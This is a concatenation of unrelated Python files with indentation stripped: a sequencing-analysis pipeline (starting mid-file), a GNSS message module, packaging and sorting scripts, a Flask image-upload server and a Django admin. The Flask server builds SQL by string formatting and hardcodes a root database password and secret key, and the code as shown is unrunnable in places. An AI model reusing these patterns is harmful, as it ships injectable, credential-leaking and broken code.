# uses kmer, targets, readLength, foldCoverage
for rLength in readLength:
for fCov in foldCoverage:
for target in targets:
for size in kmer:
sortingProcessesArgs.append((rLength, fCov, target, size))
sortingProcessesPool.map(sorting, sortingProcessesArgs)
def sorting((rLength, fCov, target, size)):
"""Performs samtools sort to return a sorted bam file"""
filename = os.path.split(target)[1]
fileNoExt = filename.split(".")[0]
megaName = "rL%s_fC%s_%s_kmer%s" % (rLength, fCov, fileNoExt, size)
sorted = megaName + "_sorted"
sortedMegaName = megaName + "_sorted.bam"
filePath = "%s/tmp/rL%s/rL%s_fC%s" % (path, rLength, rLength, fCov)
newPath = "%s/%s" % (filePath, megaName)
#Sort the BAM file
if not os.path.isfile("%s/%s" % (newPath, sortedMegaName)):
bamSort = "samtools sort %s/%s.bam %s/%s" % (newPath, megaName, newPath, sorted)
subprocess.call(bamSort, shell=True, stdout=open(os.devnull, 'wb'), stderr=open(os.devnull, 'wb'))
sys.stdout.write('.')
else:
sys.stdout.write('.')
def bamIndexingProcesses():
print '\nIndexing bam files'
bamIndexingArgs = []
if __name__ == '__main__':
bamIndexingPool = Pool()
# uses kmer, targets, readLength, foldCoverage
for rLength in readLength:
for fCov in foldCoverage:
for target in targets:
for size in kmer:
bamIndexingArgs.append((rLength, fCov, target, size))
bamIndexingPool.map(bamIndexing, bamIndexingArgs)
def bamIndexing((rLength, fCov, target, size)):
"""Indexes the sorted bam files in order to visualize the assemblies with tablet - note this is OPTIONAL"""
filename = os.path.split(target)[1]
fileNoExt = filename.split(".")[0]
megaName = "rL%s_fC%s_%s_kmer%s" % (rLength, fCov, fileNoExt, size)
sortedMegaName = megaName + "_sorted.bam"
filePath = "%s/tmp/rL%s/rL%s_fC%s" % (path, rLength, rLength, fCov)
newPath = "%s/%s" % (filePath, megaName)
indexedName = megaName + "_sorted.bai"
if not os.path.isfile("%s/%s" % (newPath, indexedName)):
bamIndex = "samtools index %s/%s %s/%s" % (newPath, sortedMegaName, newPath, indexedName)
subprocess.call(bamIndex, shell=True, stdout=open(os.devnull, 'wb'), stderr=open(os.devnull, 'wb'))
sys.stdout.write('.')
else:
sys.stdout.write('.')
def createVCFProcesses():
print '\nCreating vcf files'
createVCFArgs = []
if __name__ == '__main__':
createVCFPool = Pool()
# uses kmer, targets, readLength, foldCoverage
for rLength in readLength:
for fCov in foldCoverage:
for target in targets:
for size in kmer:
createVCFArgs.append((rLength, fCov, target, size))
createVCFPool.map(createVCF, createVCFArgs)
def createVCF((rLength, fCov, target, size)):
"""Creates the variant calling format files from which all relevant data can be pulled"""
filename = os.path.split(target)[1]
fileNoExt = filename.split(".")[0]
megaName = "rL%s_fC%s_%s_kmer%s" % (rLength, fCov, fileNoExt, size)
sortedMegaName = megaName + "_sorted.bam"
filePath = "%s/tmp/rL%s/rL%s_fC%s" % (path, rLength, rLength, fCov)
vcfFile = megaName + "_sorted.vcf"
newPath = "%s/%s" % (filePath, megaName)
faidxTarget = "%s/targets/faidxFiles/%s" % (path, filename)
# Read this to understand why certain flags were used
# http://samtools.sourceforge.net/mpileup.shtml
if not os.path.isfile("%s/%s" % (newPath, vcfFile)):
vcfPipe = "samtools mpileup -A -BQ0 -d 1000000 -uf %s %s/%s | bcftools view -cg - > %s/%s" \
% (faidxTarget, newPath, sortedMegaName, newPath, vcfFile)
subprocess.call(vcfPipe, shell=True, stdout=open(os.devnull, 'wb'), stderr=open(os.devnull, 'wb'))
sys.stdout.write('.')
else:
sys.stdout.write('.')
def createOutputFiles():
"""Parses the vcf files created above to create a handy summary table of mapping stats"""
print "\nCreating outputs"
make_path(outPath)
os.chdir(outPath)
outFile = open("SipprModelling_%s.csv" % start, "wb")
outFile.write("readLength\tfoldCoverage\ttarget\tkmerLength\tMedianQualityScore\t"
"QualityScoreSD\tMedianFoldCoverage\tFoldCoverageSD\tMedianPercentID\tqualityMetric\n")
for rLength in readLength:
for fCov in foldCoverage:
for target in targets:
for size in kmer:
total1 = 0
sys.stdout.write('.')
filename = os.path.split(target)[1]
fileNoExt = filename.split(".")[0]
megaName = "rL%s_fC%s_%s_kmer%s" % (rLength, fCov, fileNoExt, size)
filePath = "%s/tmp/rL%s/rL%s_fC%s" % (path, rLength, rLength, fCov)
vcfFile = megaName + "_sorted.vcf"
newPath = "%s/%s" % (filePath, megaName)
outputFile = "%s/%s" % (newPath, vcfFile)
# Initialise the counter, which will be used to track lines in the vcf file - if positions in the
# target are not mapped, then the position field will jump ahead of the counter
count = 1
# Initialise the arrays, which will keep track of the appropriate values for each dataset
arrQual = []
arrCov = []
arrSum = []
output = open(outputFile, "r")
for line in output:
# vcf files have 36 commented out lines at the top of each file - these are not necessary
if re.search('#', line):
pass
else:
total1 += 1
# Format of file
# CHROM POS ID REF ALT QUAL FILTER INFO FORMAT
# adk-12 8 . G . 32.7 . DP=1;AF1=0;AC1=0;DP4=0,1,0,0;MQ=29;FQ=-30.3 PL 0
# data[0] [1] [2] [3] [4] [5] [6] [7]
data = line.split("\t")
#target = data[0]
pos = data[1]
refSeq = data[3]
mapSeq = data[4]
qual = data[5]
# Depth of coverage is reported prior to the first ";"
dpLine = data[7].split(";")[0]
# For now, I'm skipping lines that indicated the presence of a possible indel
# - I may return to this later
if re.search("INDEL", dpLine):
pass
else:
# If the called base (mapSeq) is identical to the reference base (refSeq)
# - denoted by a ".", then set seq to equal refSeq, otherwise, pull the
# value of mapSeq for seq
avgQual = sum(arrQual)/total1
if mapSeq == ".":
seq = refSeq
match = 1
# This section corrects for the fact that during the conversion of bam files to vcf
# files, SNP calls and ambiguous calls look identical, except for the fact that for
# SNPs, the qualityScore (qual) tends to be higher than the surrounding bases,
# while ambiguous calls have a lower qualityScore - this loop screens for quality
# scores that are at least 10 lower than the score of the previous base
else:
if float(arrQual[-1] - 10) >= 0:
prevValue = float(arrQual[-1] - 10)
else:
prevValue = 0
if float(qual) <= prevValue:
seq = refSeq
match = 1
else:
# This attempts to catch if there are two ambiguous bases in a row;
# they will hopefully have the same value
if float(qual) == prevValue:
seq = refSeq
match = 1
else:
# "True" SNPs seem to have increased qualityScore compared to the
# surrounding values, this will catch that
if float(qual) > prevValue:
seq = mapSeq
match = 0
# Strip the "DP=" from dpLine
DP = dpLine.split("=")[1]
#vcfData[pos] = (fileName, target, refSeq, mapSeq, DP)
# If pos > count, then there is a gap in the mapping (or a deletion, but ignoring
# this possibility for now). For my purposes, I want to have data reported for
# every position, whether it is present in the vcf file or not, so I will use count
# as the position, "-" as the seq, and 0 as the quality and depth of coverage
if int(pos) > count:
#print int(pos) - count, pos, count, range(count, int(pos))
# the number of skipped positions is equal to the value for pos - count
# For each skipped position (i), set appropriate variables to appropriate values
for i in range(count, int(pos)):
posAdj = count
seqAdj = "-"
matchAdj = 0
qualAdj = 0
DPAdj = 0
#vcfData[fileName][rL][fC][target][size][int(posAdj)][seqAdj][matchAdj][qualAdj] = DP
arrQual.append(float(qualAdj))
arrCov.append(float(DPAdj))
arrSum.append(float(matchAdj))
count += 1
if int(pos) == count:
#vcfData[fileName][rL][fC][target][size][int(pos)][seq][match][qual] = DP
arrQual.append(float(qual))
arrCov.append(float(DP))
arrSum.append(float(match))
count += 1
else:
#vcfData[fileName][rL][fC][target][size][int(pos)][seq][match][qual] = DP
arrQual.append(float(qual))
arrCov.append(float(DP))
arrSum.append(float(match))
count += 1
# In the case of no data being present in a file,
total = count - 1
if total == 0:
avgQual = 0
stdQual = 0
avgCov = 0
stdCov = 0
avgID = 0
qualMet = 0
else:
avgQual = sum(arrQual)/total
stdQual = numpy.std(arrQual)
avgCov = sum(arrCov)/total
stdCov = numpy.std(arrCov)
avgID = sum(arrSum)/total * 100
qualMet = avgQual * avgCov
outFile.write("%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\n"
% (rLength, fCov, fileNoExt, size, avgQual, stdQual, avgCov, stdCov, avgID, qualMet))
output.close()
outFile.close()
def pipeline():
"""Calls all the functions in a way that they can be multi-processed"""
for reference in references:
createSimulatedFilesProcesses(reference)
faidxTargetsProcesses()
indexTargets()
#Start the mapping operations
mappingProcesses()
sortingProcesses()
bamIndexingProcesses()
createVCFProcesses()
createOutputFiles()
start = time.time()
pipeline()
print "\nElapsed Time: %s seconds" % (time.time() - start) |
from enum import IntEnum
from construct import (Struct, Int64ul, Int16ul, Int8ul, Padding, this, Bytes, PaddedString)
from ..utils.construct_utils import AutoEnum
from .defs import *
class CommandResponseMessage(MessagePayload):
"""!
@brief Response to indicate if command was processed successfully.
"""
MESSAGE_TYPE = MessageType.COMMAND_RESPONSE
MESSAGE_VERSION = 0
_STRUCT = struct.Struct('<IB3x')
def __init__(self):
self.source_sequence_num = 0
self.response = Response.OK
def pack(self, buffer: bytes = None, offset: int = 0, return_buffer: bool = True) -> (bytes, int):
if buffer is None:
buffer = bytearray(self.calcsize())
initial_offset = offset
self._STRUCT.pack_into(buffer, offset, self.source_sequence_num, self.response)
offset = self._STRUCT.size
if return_buffer:
return buffer
else:
return offset - initial_offset
def unpack(self, buffer: bytes, offset: int = 0) -> int:
initial_offset = offset
(self.source_sequence_num, self.response) = \
self._STRUCT.unpack_from(buffer=buffer, offset=offset)
offset = self._STRUCT.size
try:
self.response = Response(self.response)
except ValueError:
pass
return offset - initial_offset
@classmethod
def calcsize(cls) -> int:
return cls._STRUCT.size
def __str__(self):
string = f'Command Response\n'
string += f' Sequence number: {self.source_sequence_num}\n'
if isinstance(self.response, Response):
string += f' Response: {str(self.response)} ({int(self.response)})'
else:
string += f' Response: UNKNOWN ({int(self.response)})'
return string
class MessageRequest(MessagePayload):
"""!
@brief Request transmission of a specified message type.
"""
MESSAGE_TYPE = MessageType.MESSAGE_REQUEST
MESSAGE_VERSION = 0
_STRUCT = struct.Struct('<H2x')
def __init__(self, message_type: MessageType = MessageType.INVALID):
self.message_type: MessageType = message_type
def pack(self, buffer: bytes = None, offset: int = 0, return_buffer: bool = True) -> (bytes, int):
if buffer is None:
buffer = bytearray(self.calcsize())
initial_offset = offset
self._STRUCT.pack_into(buffer, offset, self.message_type.value)
offset += self._STRUCT.size
if return_buffer:
return buffer
else:
return offset - initial_offset
def unpack(self, buffer: bytes, offset: int = 0) -> int:
initial_offset = offset
(message_type,) = self._STRUCT.unpack_from(buffer=buffer, offset=offset)
offset += self._STRUCT._SIZE
self.message_type = MessageType(message_type)
return offset - initial_offset
def __repr__(self):
return '%s' % self.MESSAGE_TYPE.name
def __str__(self):
return 'Transmission request for message %s.' % MessageType.get_type_string(self.message_type)
@classmethod
def calcsize(cls) -> int:
return cls._STRUCT.size
class ResetRequest(MessagePayload):
"""!
@brief Perform a software or hardware reset.
"""
MESSAGE_TYPE = MessageType.RESET_REQUEST
MESSAGE_VERSION = 0
##
# @name Runtime State Reset
# @{
## Restart the navigation engine, but do not clear its position estimate.
RESTART_NAVIGATION_ENGINE = 0x00000001
## Delete all GNSS corrections information.
RESET_GNSS_CORRECTIONS = 0x00000002
## @}
##
# @name Clear Short Lived Data
# @{
## Reset the navigation engine's estimate of position, velocity, and orientation.
RESET_POSITION_DATA = 0x00000100
## Delete all saved satellite ephemeris.
RESET_EPHEMERIS = 0x00000200
## Reset bias estimates, and other IMU corrections that are typically estimated quickly.
RESET_FAST_IMU_CORRECTIONS = 0x00000400
## @}
##
# @name Clear Long Lived Data
# @{
##
# Reset all stored navigation engine data, including position, velocity, and orientation state, as well as all IMU
# corrections (fast and slow) and other training data.
RESET_NAVIGATION_ENGINE_DATA = 0x00001000
##
# Reset the device calibration data.
#
# @note
# This does _not_ reset any existing navigation engine state. It is recommended that you set @ref
# RESET_NAVIGATION_ENGINE_DATA as well under normal circumstances.
RESET_CALIBRATION_DATA = 0x00002000
## @}
##
# @name Clear Configuration Data
# @{
## Clear all configuration data.
RESET_CONFIG = 0x00100000
## @}
##
# @name Restart Hardware Modules
# @{
## Restart the GNSS measurement engine.
RESTART_GNSS_MEASUREMENT_ENGINE = 0x01000000
## @}
##
# @name Device Reset Bitmasks
# @{
##
# Perform a device hot start.
#
# A hot start is typically used to restart the navigation engine in a
# deterministic state, particularly for logging purposes.
#
# To be reset:
# - The navigation engine (@ref RESTART_NAVIGATION_ENGINE)
# - All runtime data (GNSS corrections (@ref RESET_GNSS_CORRECTIONS), etc.)
#
# Not reset:
# - Position, velocity, orientation (@ref RESET_POSITION_DATA)
# - Calibration data (@ref RESET_CALIBRATION_DATA)
# - User configuration settings (@ref RESET_CONFIG)
# - GNSS Measurement engine hardware (@ref RESTART_GNSS_MEASUREMENT_ENGINE)
HOT_START = 0x000000FF
##
# Perform a device warm start.
#
# A warm start is typically used to reset the device's estimate of position
# and kinematic state in case of error.
#
# To be reset:
# - The navigation engine (@ref RESTART_NAVIGATION_ENGINE)
# - All runtime data (GNSS corrections (@ref RESET_GNSS_CORRECTIONS), etc.)
# - Position, velocity, orientation (@ref RESET_POSITION_DATA)
#
# Not reset:
# - Fast IMU corrections (@ref RESET_FAST_IMU_CORRECTIONS)
# - Training parameters (slowly estimated IMU corrections, temperature
# compensation, etc.; @ref RESET_NAVIGATION_ENGINE_DATA)
# - Calibration data (@ref RESET_CALIBRATION_DATA)
# - User configuration settings (@ref RESET_CONFIG)
# - GNSS Measurement engine hardware (@ref RESTART_GNSS_MEASUREMENT_ENGINE)
WARM_START = 0x000001FF
##
# Perform a device cold start.
#
# A cold start is typically used to reset the device's state estimate in the
# case of error that cannot be resolved by a @ref WARM_START.
#
# To be reset:
# - The navigation engine (@ref RESTART_NAVIGATION_ENGINE)
# - All runtime data (GNSS corrections (@ref RESET_GNSS_CORRECTIONS), etc.)
# - Position, velocity, orientation (@ref RESET_POSITION_DATA)
# - Fast IMU corrections (@ref RESET_FAST_IMU_CORRECTIONS)
# - GNSS Measurement engine hardware (@ref RESTART_GNSS_MEASUREMENT_ENGINE)
#
# Not reset:
# - Training parameters (slowly estimated IMU corrections, temperature
# compensation, etc.; @ref RESET_NAVIGATION_ENGINE_DATA)
# - Calibration data (@ref RESET_CALIBRATION_DATA)
# - User configuration settings (@ref RESET_CONFIG)
#
# @note
# To reset training or calibration data as well, set the @ref
# RESET_NAVIGATION_ENGINE_DATA and @ref RESET_CALIBRATION_DATA bits.
COLD_START = 0x01000FFF
##
# Restart mask to set all persistent data, including calibration and user configuration, back to factory defaults.
#
# Note: Upper 8 bits reserved for future use (e.g., hardware reset).
FACTORY_RESET = 0x01FFFFFF
## @}
_STRUCT = struct.Struct('<I')
def __init__(self, reset_mask: int = 0):
self.reset_mask = reset_mask
def pack(self, buffer: bytes = None, offset: int = 0, return_buffer: bool = True) -> (bytes, int):
if buffer is None:
buffer = bytearray(self.calcsize())
self._STRUCT.pack_into(buffer, offset, self.reset_mask)
if return_buffer:
return buffer
else:
return self.calcsize()
def unpack(self, buffer: bytes, offset: int = 0) -> int:
initial_offset = offset
(self.reset_mask,) = \
self._STRUCT.unpack_from(buffer=buffer, offset=offset)
offset += ResetRequest._SIZE
return offset - initial_offset
@classmethod
def calcsize(cls) -> int:
return cls._STRUCT.size
def __str__(self):
return 'Reset Request [mask=0x%08x]' % self.reset_mask
class VersionInfoMessage(MessagePayload):
"""!
@brief Software and hardware version information.
"""
MESSAGE_TYPE = MessageType.VERSION_INFO
MESSAGE_VERSION = 0
VersionInfoMessageConstruct = Struct(
"system_time_ns" / Int64ul,
"fw_version_length" / Int8ul,
"engine_version_length" / Int8ul,
"hw_version_length" / Int8ul,
"rx_version_length" / Int8ul,
Padding(4),
"fw_version_str" / PaddedString(this.fw_version_length, 'utf8'),
"engine_version_str" / PaddedString(this.engine_version_length, 'utf8'),
"hw_version_str" / PaddedString(this.hw_version_length, 'utf8'),
"rx_version_str" / PaddedString(this.rx_version_length, 'utf8'),
)
def __init__(self):
self.system_time_ns = 0
self.fw_version_str = ""
self.engine_version_str = ""
self.hw_version_str = ""
self.rx_version_str = ""
def pack(self, buffer: bytes = None, offset: int = 0, return_buffer: bool = True) -> (bytes, int):
values = dict(self.__dict__)
values['fw_version_length'] = len(self.fw_version_str)
values['engine_version_length'] = len(self.engine_version_str)
values['hw_version_length'] = len(self.hw_version_str)
values['rx_version_length'] = len(self.rx_version_str)
packed_data = self.VersionInfoMessageConstruct.build(values)
return PackedDataToBuffer(packed_data, buffer, offset, return_buffer)
def unpack(self, buffer: bytes, offset: int = 0) -> int:
parsed = self.VersionInfoMessageConstruct.parse(buffer[offset:])
self.__dict__.update(parsed)
return parsed._io.tell()
def __str__(self):
string = f'Version Info @ %s\n' % system_time_to_str(self.system_time_ns)
string += f' Firmware: {self.fw_version_str}\n'
string += f' FusionEngine: {self.engine_version_str}\n'
string += f' Hardware: {self.hw_version_str}\n'
string += f' GNSS receiver: {self.rx_version_str}'
return string
def calcsize(self) -> int:
return len(self.pack())
class EventNotificationMessage(MessagePayload):
"""!
@brief Notification of a system event for logging purposes.
"""
MESSAGE_TYPE = MessageType.EVENT_NOTIFICATION
MESSAGE_VERSION = 0
class Action(IntEnum):
LOG = 0
RESET = 1
CONFIG_CHANGE = 2
def __str__(self):
return super().__str__().replace(self.__class__.__name__ + '.', '')
EventNotificationConstruct = Struct(
"action" / AutoEnum(Int8ul, Action),
Padding(3),
"system_time_ns" / Int64ul,
"event_flags" / Int64ul,
"event_description_len_bytes" / Int16ul,
Padding(2),
"event_description" / Bytes(this.event_description_len_bytes),
)
def __init__(self):
self.action = self.Action.LOG
self.system_time_ns = 0
self.event_flags = 0
self.event_description = bytes()
def pack(self, buffer: bytes = None, offset: int = 0, return_buffer: bool = True) -> (bytes, int):
values = dict(self.__dict__)
values['event_description_len_bytes'] = len(self.event_description)
packed_data = self.EventNotificationConstruct.build(values)
return PackedDataToBuffer(packed_data, buffer, offset, return_buffer)
def unpack(self, buffer: bytes, offset: int = 0) -> int:
parsed = self.EventNotificationConstruct.parse(buffer[offset:])
self.__dict__.update(parsed)
return parsed._io.tell()
def __str__(self):
fields = ['action', 'event_flags', 'event_description']
string = f'Event Notification @ %s\n' % system_time_to_str(self.system_time_ns)
for field in fields:
val = str(self.__dict__[field]).replace('Container:', '')
string += f' {field}: {val}\n'
return string.rstrip()
def calcsize(self) -> int:
return len(self.pack())
|
import importlib
import os
import re
import sys
from cpt.packager import ConanMultiPackager
spec = importlib.util.spec_from_file_location('comm', 'scripts/common.py')
mod = importlib.util.module_from_spec(spec)
spec.loader.exec_module(mod)
if __name__ == "__main__":
projname = os.getenv('CONAN_PACKAGE_NAME')
if not projname:
raise Exception('CONAN_PACKAGE_NAME environment variable not defined')
username = os.getenv('CONAN_USERNAME')
if not username:
raise Exception('CONAN_USERNAME environment variable not defined')
branch = os.getenv('TRAVIS_BRANCH')
if not branch:
raise Exception('TRAVIS_BRANCH environment variable not defined (are you not releasing on Travis?)')
matched, projver = mod.is_dev_branch()
channel = 'nightly'
if not matched:
matched, projver = mod.is_rel_branch()
channel = 'stable'
if matched:
reference = f'{projname}/{projver}@{username}/{channel}'
builder = ConanMultiPackager(reference=reference)
builder.add({}, {}, {}, {})
builder.run()
else:
print('Not release or development branch, ignoring release!')
|
import numpy as np
from time import process_time_ns as ns
def partition(v, b, e):
p = b
for i in range(b+1, e+1):
if v[i] <= v[b]:
p += 1
v[i], v[p] = v[p], v[i]
v[p], v[b] = v[b], v[p]
return p
def sort(v, b=0, e=None):
if e is None:
e = len(v) - 1
def _sort(v, b, e):
if b >= e: #(1)
return
p = partition(v, b, e) #(2)
_sort(v, b, p-1) #(3)
_sort(v, p+1, e) #(4)
return _sort(v, b, e)
def main(*args):
v = np.random.randint(1, 100, 100)
s = sorted(v)
r = sorted(v, reverse=True)
n1 = ns()
sort(v)
n2 = ns()
print(n2-n1)
n1 = ns()
sort(s)
n2 = ns()
print(n2-n1)
n1 = ns()
sort(r)
n2 = ns()
print(n2-n1)
if __name__ == '__main__':
main() |
# coding=utf-8
import os
import urllib.request
from flask import Flask, flash, request, redirect, jsonify
from flask import send_from_directory
from werkzeug.utils import secure_filename
import uuid
from cv_code import blur_image
from db_code import Database
# set host address, allow all ip address
HOST = '0.0.0.0'
# uploaded file extension allowed filtering set
ALLOWED_EXTENSIONS = set(['txt', 'pdf', 'png', 'jpg', 'jpeg', 'gif'])
# uploaded file saving path
# uploads/src: original image
# uploads/dst: after image processing image
UPLOAD_FOLDER = '/uploads'
# flask setting
app = Flask(__name__, template_folder='template')
app.secret_key = "secret key"
app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER
# maximum file size
app.config['MAX_CONTENT_LENGTH'] = 16 * 1024 * 1024
# static directory path
static_file_dir = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'static')
uploads_file_dir = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'uploads')
# init database
mysql_db = Database({
'db_host': '127.0.0.1',
'db_user': 'root',
'db_password': 'dongdong',
'db_port': 3306,
'db_name': 'mysql-example'
})
# route: API/
@app.route('/', methods=['GET'])
def serve_dir_directory_index():
return send_from_directory(static_file_dir, 'index.html')
# route: API/*
@app.route('/<path:path>', methods=['GET'])
def serve_file_in_dir(path):
if not os.path.isfile(os.path.join(static_file_dir, path)):
path = os.path.join(path, 'index.html')
return send_from_directory(static_file_dir, path)
# route: API/uploads/*
@app.route('/uploads/<path:path>', methods=['GET'])
def serve_file_in_upload(path):
return send_from_directory(uploads_file_dir, path)
# filtering file extension
def allowed_file(filename):
return '.' in filename and filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS
# get file extension
def get_extension(filename):
return filename.rsplit('.', 1)[1].lower()
# save image url to database
def save_image_url(original_url, result_url):
sql = "INSERT INTO `image` (`original_url`, `result_url`) VALUES ('{!s}', '{!s}')".format(original_url, result_url)
mysql_db.run_query(sql)
# route: API/api/upload
@app.route('/api/upload', methods=['POST'])
def upload_file():
if request.method == 'POST':
print(request.host.split(':')[0])
request_ip = request.host.split(':')[0]
# check if the post request has the file part
if 'file' not in request.files:
dst = {
'msg': 'no files',
'code': 10040
}
return jsonify(dst)
# get file param
file = request.files['file']
# generate uuid string for saving filename
uuid_str = str(uuid.uuid4())
# create full filename with file extension
filename = uuid_str + '.' + str(get_extension(file.filename))
# check the file extension is allow or deny
if file and allowed_file(file.filename):
original_url = app.config['UPLOAD_FOLDER'] + '/src/' + filename
result_url = app.config['UPLOAD_FOLDER'] + '/dst/' + filename
# save original file to uploads/src folder
file.save(os.path.join('.' + original_url))
# save image urls to database
save_image_url(original_url, result_url)
# blur the image file by opencv code
# will saving to uploads/dst folder
blur_image(filename)
# return result image file url
dst = {
'msg': 'upload file success',
'code': 200,
'result_url': 'http://'+request_ip+':5000/uploads/dst/' + filename
}
return jsonify(dst)
else:
# return error message
dst = {
'msg': 'file type not allowed',
'code': 10050
}
return jsonify(dst)
if __name__ == "__main__":
# run for any ip address
app.run(host=HOST, port=5000)
|
from .models import Model
__all__ = ["Model"]
|
import wxbot
wxbot.main_loop()
|
### $Id: admin.py,v 1.15 2017/12/04 08:16:37 muntaza Exp $
from django.contrib import admin
from umum.models import Provinsi, Kabupaten, LokasiBidang, SKPD, SUBSKPD, KodeBarang, HakTanah, SatuanBarang, KeadaanBarang, SKPenghapusan, MutasiBerkurang, JenisPemanfaatan, AsalUsul, Tahun, GolonganBarang, Tanah, KontrakTanah, PenghapusanTanah, TanahPenghapusan, PemanfaatanTanah, TanahPemanfaatan, HargaTanah
#### Tanah
from umum.models import TanahDisdikSMPN2Halong, HargaTanahDisdikSMPN2Halong
from umum.admin import HargaTanahInline, TanahAdmin, KontrakTanahAdmin, HargaTanahAdmin
from umum.admin import GedungBangunanInline
#### Gedung Bangunan
from gedungbangunan.models import StatusTingkat, StatusBeton, KontrakGedungBangunan, HargaGedungBangunan, GedungBangunan, PenghapusanGedungBangunan, PemanfaatanGedungBangunan, TahunBerkurangGedungBangunan, Ruangan
from gedungbangunan.models import GedungBangunanPemanfaatan, GedungBangunanPenghapusan, GedungBangunanRuangan
from gedungbangunan.models import GedungBangunanDisdikSMPN2Halong, HargaGedungBangunanDisdikSMPN2Halong, GedungBangunanRuanganDisdikSMPN2Halong
from gedungbangunan.admin import HargaGedungBangunanInline, GedungBangunanAdmin, KontrakGedungBangunanAdmin, HargaGedungBangunanAdmin, RuanganInline, GedungBangunanRuanganAdmin
#### Peralatan Mesin
from peralatanmesin.models import KontrakPeralatanMesin, HargaPeralatanMesin, PeralatanMesin, PenghapusanPeralatanMesin, PemanfaatanPeralatanMesin, TahunBerkurangPeralatanMesin
#untuk menampung inline
from peralatanmesin.models import PeralatanMesinPemanfaatan, PeralatanMesinPenghapusan
from peralatanmesin.models import PeralatanMesinDisdikSMPN2Halong, HargaPeralatanMesinDisdikSMPN2Halong
from peralatanmesin.admin import HargaPeralatanMesinInline, PeralatanMesinAdmin, KontrakPeralatanMesinAdmin, HargaPeralatanMesinAdmin
#### Class Tanah
class GedungBangunanDisdikSMPN2HalongInline(GedungBangunanInline):
model = GedungBangunanDisdikSMPN2Halong
class HargaTanahDisdikSMPN2HalongInline(HargaTanahInline):
model = HargaTanahDisdikSMPN2Halong
def formfield_for_foreignkey(self, db_field, request, **kwargs):
if db_field.name == "id_kontrak":
kwargs["queryset"] = KontrakTanah.objects.filter(id_skpd__exact=7)
return super(HargaTanahDisdikSMPN2HalongInline, self).formfield_for_foreignkey(db_field, request, **kwargs)
class TanahDisdikSMPN2HalongAdmin(TanahAdmin):
inlines = [HargaTanahDisdikSMPN2HalongInline]
def formfield_for_foreignkey(self, db_field, request, **kwargs):
if db_field.name == "id_sub_skpd":
qs_id_sub_skpd=105
kwargs["queryset"] = SUBSKPD.objects.filter(id__exact=qs_id_sub_skpd)
return super(TanahDisdikSMPN2HalongAdmin, self).formfield_for_foreignkey(db_field, request, **kwargs)
def get_queryset(self, request):
qs_id_sub_skpd=105
return self.model.objects.filter(id_sub_skpd__exact=qs_id_sub_skpd).filter(id_mutasi_berkurang__exact=5)
class HargaTanahDisdikSMPN2HalongAdmin(HargaTanahAdmin):
def get_queryset(self, request):
qs_id_sub_skpd=105
tanah_qs = Tanah.objects.filter(id_sub_skpd__exact=qs_id_sub_skpd)
return self.model.objects.filter(id_tanah__in=tanah_qs)
### Register Tanah DisdikSMPN2Halong
admin.site.register(TanahDisdikSMPN2Halong, TanahDisdikSMPN2HalongAdmin)
admin.site.register(HargaTanahDisdikSMPN2Halong, HargaTanahDisdikSMPN2HalongAdmin)
#### Class Gedung dan Bangunan
class HargaGedungBangunanDisdikSMPN2HalongInline(HargaGedungBangunanInline):
model = HargaGedungBangunanDisdikSMPN2Halong
def formfield_for_foreignkey(self, db_field, request, **kwargs):
if db_field.name == "id_kontrak_gedung_bangunan":
kwargs["queryset"] = KontrakGedungBangunan.objects.filter(id_skpd__exact=7)
return super(HargaGedungBangunanDisdikSMPN2HalongInline, self).formfield_for_foreignkey(db_field, request, **kwargs)
class GedungBangunanDisdikSMPN2HalongAdmin(GedungBangunanAdmin):
inlines = [HargaGedungBangunanDisdikSMPN2HalongInline]
def formfield_for_foreignkey(self, db_field, request, **kwargs):
if db_field.name == "id_sub_skpd":
qs_id_sub_skpd=105
kwargs["queryset"] = SUBSKPD.objects.filter(id__exact=qs_id_sub_skpd)
return super(GedungBangunanDisdikSMPN2HalongAdmin, self).formfield_for_foreignkey(db_field, request, **kwargs)
def get_queryset(self, request):
qs_id_sub_skpd=105
return self.model.objects.filter(id_sub_skpd__exact=qs_id_sub_skpd).filter(id_golongan_barang__exact=3).filter(id_mutasi_berkurang__exact=5)
class GedungBangunanRuanganDisdikSMPN2HalongAdmin(GedungBangunanRuanganAdmin):
def get_queryset(self, request):
qs = 105
return self.model.objects.filter(id_sub_skpd__exact=qs).filter(id_golongan_barang__exact=3).filter(id_mutasi_berkurang__exact=5)
class HargaGedungBangunanDisdikSMPN2HalongAdmin(HargaGedungBangunanAdmin):
def get_queryset(self, request):
qs_id_sub_skpd=105
gedung_bangunan_qs = GedungBangunan.objects.filter(id_sub_skpd__exact=qs_id_sub_skpd)
return self.model.objects.filter(id_gedung_bangunan__in=gedung_bangunan_qs)
###Register GedungBangunan DisdikSMPN2Halong
admin.site.register(GedungBangunanDisdikSMPN2Halong, GedungBangunanDisdikSMPN2HalongAdmin)
admin.site.register(GedungBangunanRuanganDisdikSMPN2Halong, GedungBangunanRuanganDisdikSMPN2HalongAdmin)
admin.site.register(HargaGedungBangunanDisdikSMPN2Halong, HargaGedungBangunanDisdikSMPN2HalongAdmin)
#### Class Peralatan Mesin
class HargaPeralatanMesinDisdikSMPN2HalongInline(HargaPeralatanMesinInline):
model = HargaPeralatanMesinDisdikSMPN2Halong
def formfield_for_foreignkey(self, db_field, request, **kwargs):
if db_field.name == "id_kontrak_peralatan_mesin":
kwargs["queryset"] = KontrakPeralatanMesin.objects.filter(id_skpd__exact=7)
return super(HargaPeralatanMesinDisdikSMPN2HalongInline, self).formfield_for_foreignkey(db_field, request, **kwargs)
class PeralatanMesinDisdikSMPN2HalongAdmin(PeralatanMesinAdmin):
inlines = [HargaPeralatanMesinDisdikSMPN2HalongInline]
def formfield_for_foreignkey(self, db_field, request, **kwargs):
if db_field.name == "id_sub_skpd":
qs_id_sub_skpd=105
kwargs["queryset"] = SUBSKPD.objects.filter(id__exact=qs_id_sub_skpd)
if db_field.name == "id_ruangan":
qs_id_sub_skpd=105
kwargs["queryset"] = Ruangan.objects.filter(id_gedung_bangunan__id_sub_skpd__exact=qs_id_sub_skpd)
return super(PeralatanMesinDisdikSMPN2HalongAdmin, self).formfield_for_foreignkey(db_field, request, **kwargs)
def get_queryset(self, request):
qs_id_sub_skpd=105
return self.model.objects.filter(id_sub_skpd__exact=qs_id_sub_skpd).filter(id_mutasi_berkurang__exact=5)
class HargaPeralatanMesinDisdikSMPN2HalongAdmin(HargaPeralatanMesinAdmin):
